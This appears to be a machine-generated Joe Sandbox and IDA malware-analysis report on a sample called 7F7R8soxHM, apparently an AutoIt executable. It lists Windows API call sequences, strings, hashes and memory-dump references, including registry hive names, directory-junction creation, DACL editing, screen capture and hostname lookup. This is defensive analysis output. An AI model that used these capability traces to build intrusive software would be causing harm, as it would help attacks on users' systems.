                      • Opcode ID: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
                      • Instruction ID: 1b80546c7905b8d68cdd23b6605886b6fa0f0e03c284c57139d2eb2845f5a65a
                      • Opcode Fuzzy Hash: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
                      • Instruction Fuzzy Hash: B7515E711043059FC700EF24D98196AB7F4FF98718F14996DF89A672A2DB31EE0ACB52
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDA47A
                      • __swprintf.LIBCMT ref: 00EDA49C
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EDA4D9
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EDA4FE
                      • _memset.LIBCMT ref: 00EDA51D
                      • _wcsncpy.LIBCMT ref: 00EDA559
                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EDA58E
                      • CloseHandle.KERNEL32(00000000), ref: 00EDA599
                      • RemoveDirectoryW.KERNEL32(?), ref: 00EDA5A2
                      • CloseHandle.KERNEL32(00000000), ref: 00EDA5AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                      • String ID: :$\$\??\%s
                      • API String ID: 2733774712-3457252023
                      • Opcode ID: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
                      • Instruction ID: 165c6989963925740e325f786886101cd26733c84bae6de45de172a7f9601241
                      • Opcode Fuzzy Hash: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
                      • Instruction Fuzzy Hash: 9E31AEB650020AABDB219FA1DC48FFB33BCEF88705F1451B6F908E6160E77097458B25
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                      • String ID:
                      • API String ID: 884005220-0
                      • Opcode ID: 67b965ab29300125ec8fa319787abd59e33de0a317c72dac2c0f7ddd7eec0c66
                      • Instruction ID: 69aabd74fd31051de67460abd65d46bb528ec76875865d73b228f3a6a3b42feb
                      • Opcode Fuzzy Hash: 67b965ab29300125ec8fa319787abd59e33de0a317c72dac2c0f7ddd7eec0c66
                      • Instruction Fuzzy Hash: 1161E372504305AFEB116F24D841B6977E5EB1A739F186139E801BF191DB34F940C762
                      APIs
                      • __wsplitpath.LIBCMT ref: 00EDDC7B
                      • _wcscat.LIBCMT ref: 00EDDC93
                      • _wcscat.LIBCMT ref: 00EDDCA5
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EDDCBA
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDDCCE
                      • GetFileAttributesW.KERNEL32(?), ref: 00EDDCE6
                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EDDD00
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDDD12
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                      • String ID: *.*
                      • API String ID: 34673085-438819550
                      • Opcode ID: f9ff3735a8ce78279fe2ae24246fde03d2df5636def3f83a317877fbea56bf02
                      • Instruction ID: c81536bf817667cb96448e7841e02389664965655d9e7a48a8fcfdb58090cdb3
                      • Opcode Fuzzy Hash: f9ff3735a8ce78279fe2ae24246fde03d2df5636def3f83a317877fbea56bf02
                      • Instruction Fuzzy Hash: 4F8171715082459FCB24EF24CC459AAB7E8EF88318F15A82FF889E7351E731D946CB52
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EFC4EC
                      • GetFocus.USER32 ref: 00EFC4FC
                      • GetDlgCtrlID.USER32(00000000), ref: 00EFC507
                      • _memset.LIBCMT ref: 00EFC632
                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EFC65D
                      • GetMenuItemCount.USER32(?), ref: 00EFC67D
                      • GetMenuItemID.USER32(?,00000000), ref: 00EFC690
                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EFC6C4
                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EFC70C
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EFC744
                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EFC779
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                      • String ID: 0
                      • API String ID: 1296962147-4108050209
                      • Opcode ID: e65dca02599655e48cb6c363147e4126c9cc13a9221a03b634b0099bbf0542c0
                      • Instruction ID: 0db9ba8d7ff0dc20299cd98c2347d7d4fcf896c0a9253ba57b99ea22921e3adc
                      • Opcode Fuzzy Hash: e65dca02599655e48cb6c363147e4126c9cc13a9221a03b634b0099bbf0542c0
                      • Instruction Fuzzy Hash: DA817E70508309AFD710DF24CA84A7ABBE4FF88758F20592EFA95E7291D730D905CB92
                      APIs
                        • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                        • Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                        • Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                        • Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                        • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                        • Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
                        • Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
                        • Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8458
                      • _memset.LIBCMT ref: 00EC846D
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC848C
                      • GetLengthSid.ADVAPI32(?), ref: 00EC849D
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EC84DA
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC84F6
                      • GetLengthSid.ADVAPI32(?), ref: 00EC8513
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8522
                      • HeapAlloc.KERNEL32(00000000), ref: 00EC8529
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC854A
                      • CopySid.ADVAPI32(00000000), ref: 00EC8551
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8582
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC85A8
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC85BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
                      • Instruction ID: be1b65f47c1020efd1684c5baa67a75548ef60e1994f7e875b2d79b9e2cbc9bd
                      • Opcode Fuzzy Hash: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
                      • Instruction Fuzzy Hash: F9613871900219AFDF109FA5DE45EAEBBB9FF48304F048169E815B7291DB729A06CF60
                      APIs
                      • GetDC.USER32(00000000), ref: 00EE76A2
                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EE76AE
                      • CreateCompatibleDC.GDI32(?), ref: 00EE76BA
                      • SelectObject.GDI32(00000000,?), ref: 00EE76C7
                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EE771B
                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EE7757
                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EE777B
                      • SelectObject.GDI32(00000006,?), ref: 00EE7783
                      • DeleteObject.GDI32(?), ref: 00EE778C
                      • DeleteDC.GDI32(00000006), ref: 00EE7793
                      • ReleaseDC.USER32(00000000,?), ref: 00EE779E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      • Opcode ID: ffbf8daf2897f736f88434db835ebf70ad884eb534b7c90b4bfaf7278ab41c59
                      • Instruction ID: dac800ad4847e569d859dac71e2f96a421cfb37db70b4db3b4ed6fc85fa702e4
                      • Opcode Fuzzy Hash: ffbf8daf2897f736f88434db835ebf70ad884eb534b7c90b4bfaf7278ab41c59
                      • Instruction Fuzzy Hash: 1B516B75904349EFCB15CFA9CC84EAEBBB9EF48710F14852EF999A7210D731A944CB60
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,00EFFB78), ref: 00EDA0FC
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EDA11E
                      • __swprintf.LIBCMT ref: 00EDA177
                      • __swprintf.LIBCMT ref: 00EDA190
                      • _wprintf.LIBCMT ref: 00EDA246
                      • _wprintf.LIBCMT ref: 00EDA264
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: LoadString__swprintf_wprintf$_memmove
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 311963372-2391861430
                      • Opcode ID: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
                      • Instruction ID: 6b7aae980be20341d69732b85561ec4b4f491e330966490a6c2b36c0fd9bae7e
                      • Opcode Fuzzy Hash: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
                      • Instruction Fuzzy Hash: 72518E72900209BACF15EBE0DD86EEEB7B9EF04300F245166F509721A1EB316F59DB61
                      APIs
                        • Part of subcall function 00E90B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E76C6C,?,00008000), ref: 00E90BB7
                        • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E76E5A
                        • Part of subcall function 00E759CD: _wcscpy.LIBCMT ref: 00E75A05
                        • Part of subcall function 00E9387D: _iswctype.LIBCMT ref: 00E93885
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                      • API String ID: 537147316-1018226102
                      • Opcode ID: 01856ff4e6f313214d43dc30cb5f52085bbc40eeb1b7343278d7c25dde57bfcb
                      • Instruction ID: 24a56b0d90f09518db61982938696e673995b8de745dfaa3a2bfa91bdd54e8ae
                      • Opcode Fuzzy Hash: 01856ff4e6f313214d43dc30cb5f52085bbc40eeb1b7343278d7c25dde57bfcb
                      • Instruction Fuzzy Hash: CA02AF311083419FC724EF24C881AAFBBE5FF89354F04991DF49AA72A1DB30E949CB52
                      APIs
                      • _memset.LIBCMT ref: 00E745F9
                      • GetMenuItemCount.USER32(00F36890), ref: 00EAD7CD
                      • GetMenuItemCount.USER32(00F36890), ref: 00EAD87D
                      • GetCursorPos.USER32(?), ref: 00EAD8C1
                      • SetForegroundWindow.USER32(00000000), ref: 00EAD8CA
                      • TrackPopupMenuEx.USER32(00F36890,00000000,?,00000000,00000000,00000000), ref: 00EAD8DD
                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EAD8E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                      • String ID:
                      • API String ID: 2751501086-0
                      • Opcode ID: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
                      • Instruction ID: b0f775b47ad1a7b21c2d8e58b8b1b06c3619cdd2eecf029a150d509ea95a0046
                      • Opcode Fuzzy Hash: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
                      • Instruction Fuzzy Hash: A9712A70604205BFEB248F64DC45FAABF64FF4A368F105216F529BA1E0C7B1AC10DB94
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 3964851224-909552448
                      • Opcode ID: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
                      • Instruction ID: 16ea6aa0ede1977d9d8b1b1b575009231c51d04411ae5aeb7095a92393be959d
                      • Opcode Fuzzy Hash: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
                      • Instruction Fuzzy Hash: E6419A3010425ECFDF10EF94E891AFA3364AF11304F416494FE917B292DB30A95ADBA0
                      APIs
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                        • Part of subcall function 00E77A84: _memmove.LIBCMT ref: 00E77B0D
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ED55D2
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ED55E8
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED55F9
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ED560B
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ED561C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: SendString$_memmove
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2279737902-1007645807
                      • Opcode ID: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
                      • Instruction ID: 24e413e796f57aa4aa9c3344ab684e2ed736a3ac97d16271acb700b1dd00ea0e
                      • Opcode Fuzzy Hash: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
                      • Instruction Fuzzy Hash: B81104219501697AE720F661EC4ADFFBBBCEF92B00F40142AB854B20C1EEA18D05C5A2
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 208665112-3771769585
                      • Opcode ID: c5f25951648b27951da0ee283f58eb014f24d49cac5795447740acd6bcd7e13f
                      • Instruction ID: c5888af7c9095394db142b3c2c610aa8505c26c6427cb012b3d42733c7e0307f
                      • Opcode Fuzzy Hash: c5f25951648b27951da0ee283f58eb014f24d49cac5795447740acd6bcd7e13f
                      • Instruction Fuzzy Hash: 7011F371904116AFCF24AB619C46EEA77ECDF80710F0411B6F504B2191EF719A868651
                      APIs
                      • timeGetTime.WINMM ref: 00ED521C
                        • Part of subcall function 00E90719: timeGetTime.WINMM(?,75C0B400,00E80FF9), ref: 00E9071D
                      • Sleep.KERNEL32(0000000A), ref: 00ED5248
                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00ED526C
                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ED528E
                      • SetActiveWindow.USER32 ref: 00ED52AD
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ED52BB
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00ED52DA
                      • Sleep.KERNEL32(000000FA), ref: 00ED52E5
                      • IsWindow.USER32 ref: 00ED52F1
                      • EndDialog.USER32(00000000), ref: 00ED5302
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
                      • Instruction ID: 0aa31bcd0c515c889be1829e400947ffb2890eb82ddec2a89ccf9d8f64c656ba
                      • Opcode Fuzzy Hash: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
                      • Instruction Fuzzy Hash: 9C21C9B1104708AFEB146F71EC89A363B6AEF84357F042425F401F13B5DB619D09E761
                      APIs
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • CoInitialize.OLE32(00000000), ref: 00EDD855
                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EDD8E8
                      • SHGetDesktopFolder.SHELL32(?), ref: 00EDD8FC
                      • CoCreateInstance.OLE32(00F02D7C,00000000,00000001,00F2A89C,?), ref: 00EDD948
                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EDD9B7
                      • CoTaskMemFree.OLE32(?,?), ref: 00EDDA0F
                      • _memset.LIBCMT ref: 00EDDA4C
                      • SHBrowseForFolderW.SHELL32(?), ref: 00EDDA88
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EDDAAB
                      • CoTaskMemFree.OLE32(00000000), ref: 00EDDAB2
                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EDDAE9
                      • CoUninitialize.OLE32(00000001,00000000), ref: 00EDDAEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                      • String ID:
                      • API String ID: 1246142700-0
